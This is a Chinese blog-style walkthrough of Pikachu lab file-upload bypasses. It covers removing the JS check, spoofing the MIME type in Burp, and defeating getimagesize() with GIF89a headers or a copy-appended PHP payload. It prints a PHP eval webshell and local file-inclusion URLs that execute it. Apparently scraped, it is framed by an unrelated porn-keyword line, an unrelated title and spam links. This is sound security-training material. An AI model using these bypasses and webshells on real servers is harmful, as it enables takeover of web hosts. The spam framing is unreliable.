中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

無極網(wǎng)站站怎么有的下不了如何讓百度收錄自己信息

無極網(wǎng)站站怎么有的下不了,如何讓百度收錄自己信息,google 云 wordpress,企業(yè)建站源代碼文章目錄 client checkMIME Typegetimagesize 文件上傳功能在web應(yīng)用系統(tǒng)很常見,比如很多網(wǎng)站注冊的時候需要上傳頭像、上傳附件等等。當(dāng)用戶點擊上傳按鈕后,后臺會對上傳的文件進行判斷 比如是否是指定的類型、后綴名、大小等等,然后將其按…

文章目錄

      • client check
      • MIME Type
      • getimagesize

文件上傳功能在web應(yīng)用系統(tǒng)很常見,比如很多網(wǎng)站注冊的時候需要上傳頭像、上傳附件等等。當(dāng)用戶點擊上傳按鈕后,后臺會對上傳的文件進行判斷

比如是否是指定的類型、后綴名、大小等等,然后將其按照設(shè)計的格式進行重命名后存儲在指定的目錄。

如果說后臺對上傳的文件沒有進行任何的安全判斷或者判斷條件不夠嚴(yán)謹(jǐn),則攻擊著可能會上傳一些惡意的文件,比如一句話木馬,從而導(dǎo)致后臺服務(wù)器被webshell。

所以,在設(shè)計文件上傳功能時,一定要對傳進來的文件進行嚴(yán)格的安全考慮。比如:

? --驗證文件類型、后綴名、大小;
? --驗證文件的上傳方式;
? --對文件進行一定復(fù)雜的重命名;
? --不要暴露文件上傳后的路徑;

client check

image-20230816202622921

上傳一句話木馬1.php

<?php eval(@$_POST['password']);?>

報錯顯示說不符合要求

image-20230816202851732

查看頁面代碼,發(fā)現(xiàn)有js函數(shù)做驗證

image-20230816202947181

前端校驗不值一提,直接刪除js校驗函數(shù)

image-20230816203051214

這時候一句話木馬已經(jīng)上傳,可以通過蟻劍來連接進入

木馬上傳的路徑

192.168.80.139/pikachu/vul/unsafeupload/uploads/1.php

image-20230816203332319

image-20230816203418292

MIME Type

MIME(多用途互聯(lián)網(wǎng)郵件擴展類型),是設(shè)定某種擴展名的文件用一種應(yīng)用程序來打開的方式類型,當(dāng)該擴展文件被訪問的時候,瀏覽器會自動使用指定應(yīng)用程序來打開。多用于指定一些客戶端自定義的文件名,以及一些媒體文件打開方式。
每個MIME類型由兩部分組成,前面是數(shù)據(jù)的大類別,例如聲音audio、圖像image等,后面定義具體的種類,常見的MIME類型,比如:

超文本標(biāo)記語言文本.html texthtml
普通文本.txt text/plain
RTF文本.rtf application/rtf
GIF圖形.gif image/gif
JPEG圖形.ipeg.jpg image/jpeg

繼續(xù)提交php木馬文件,使用Burpsuite抓取數(shù)據(jù)包,發(fā)送到Repeater修改Content-Type

image-20230816205716315

image-20230816205803517

getimagesize

菜鳥教程

GetimagesizePHP提供的一個用來判斷目標(biāo)文件是不是圖片的函數(shù)

對文件的開頭內(nèi)容進行了檢測并且通過二進制識別是否為圖像,那么就可以利用文件頭欺騙,來讓getimagesize()函數(shù)檢測無效。

1、制作圖片木馬方式一

這里用GIF的文件頭,在一句話木馬前加上GIF的文件頭標(biāo)識,后綴改為png格式

GIF89a
<?php phpinfo(); ?> 

image-20230816212939811

圖片上傳后保存的地址:http://192.168.80.139/pikachu/vul/unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png

通過使用文件包含路徑去訪問后門文件

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/33780664dccf36108f6808817624.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

image-20230816213217472

2、制作圖片木馬方式二

準(zhǔn)備一個jpeg格式的圖片,還有一個php木馬文件

通過CMD命令將兩個合成一個ws.jpeg,生成的文件前面內(nèi)容是2.jpeg,后面是12.php內(nèi)容

copy /d 2.jpeg + 12.php   ws.jpeg

image-20230816213804670

上傳ws.jpeg圖片

image-20230816214021563

uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg

雖然我們繞過getimagesize(),成功上傳圖片,但只訪問圖片里面的php代碼是執(zhí)行不了的

需要通過文件包含路徑去訪問木馬文件

http://192.168.80.139/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2023/08/16/38476764dcd1bd7cf51012008763.jpeg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

image-20230816214220469

http://www.risenshineclean.com/news/30491.html

相關(guān)文章:

  • 新都網(wǎng)站開發(fā)鄭州百度網(wǎng)站優(yōu)化排名
  • 營銷網(wǎng)站的搭建磁力兔子
  • 類似非小號的網(wǎng)站怎么做軟文推廣一般發(fā)布在哪些平臺
  • 上城網(wǎng)站建設(shè)百度快照推廣是什么意思
  • 網(wǎng)站添加視頻代碼網(wǎng)絡(luò)建站流程
  • 亞馬遜做deal的網(wǎng)站淘寶指數(shù)網(wǎng)址
  • 網(wǎng)站建設(shè)怎樣上傳程序企業(yè)網(wǎng)站營銷的實現(xiàn)方式
  • 做網(wǎng)站的畢設(shè)開題依據(jù)在線注冊網(wǎng)站
  • 如何在office做網(wǎng)站360站長平臺
  • 公司網(wǎng)站維護好做嗎百度移動端排名軟件
  • 網(wǎng)站建設(shè)外包流程網(wǎng)站排名優(yōu)化怎樣做
  • 萊蕪亓家網(wǎng)站優(yōu)化神馬網(wǎng)站關(guān)鍵詞排名價格
  • 網(wǎng)站建設(shè)在線視頻百度云搜索入口
  • diy做網(wǎng)站搜索關(guān)鍵詞的工具
  • 學(xué)做靜態(tài)網(wǎng)站怎么做電商生意
  • 織夢網(wǎng)站聯(lián)系我們的地圖怎么做關(guān)鍵詞搜索廣告
  • 湛江模板建站系統(tǒng)海外短視頻軟件
  • 哪里做網(wǎng)站最好小時seo加盟
  • 建設(shè)云南省癌癥中心網(wǎng)站關(guān)鍵詞優(yōu)化價格
  • 網(wǎng)站新聞對百度優(yōu)化有用嗎百度網(wǎng)盤搜索入口
  • 虛擬主機怎么弄網(wǎng)站南昌seo推廣
  • 網(wǎng)站專做盜版小說 會犯法嗎百度搜索指數(shù)排行榜
  • 諸城網(wǎng)絡(luò)營銷免費發(fā)seo外鏈平臺
  • 廈門大型企業(yè)網(wǎng)站開發(fā)公司高級seo招聘
  • 學(xué)校教育網(wǎng)站模板惡意點擊推廣神器
  • 有沒有好網(wǎng)站推薦提升網(wǎng)頁優(yōu)化排名
  • ppt做的好的網(wǎng)站有哪些樂事薯片軟文推廣
  • nb-iot網(wǎng)站開發(fā)百度付費推廣有幾種方式
  • 合肥晨曦網(wǎng)站建設(shè)百度競價關(guān)鍵詞怎么優(yōu)化
  • 東莞市國外網(wǎng)站建設(shè)平臺谷歌網(wǎng)頁版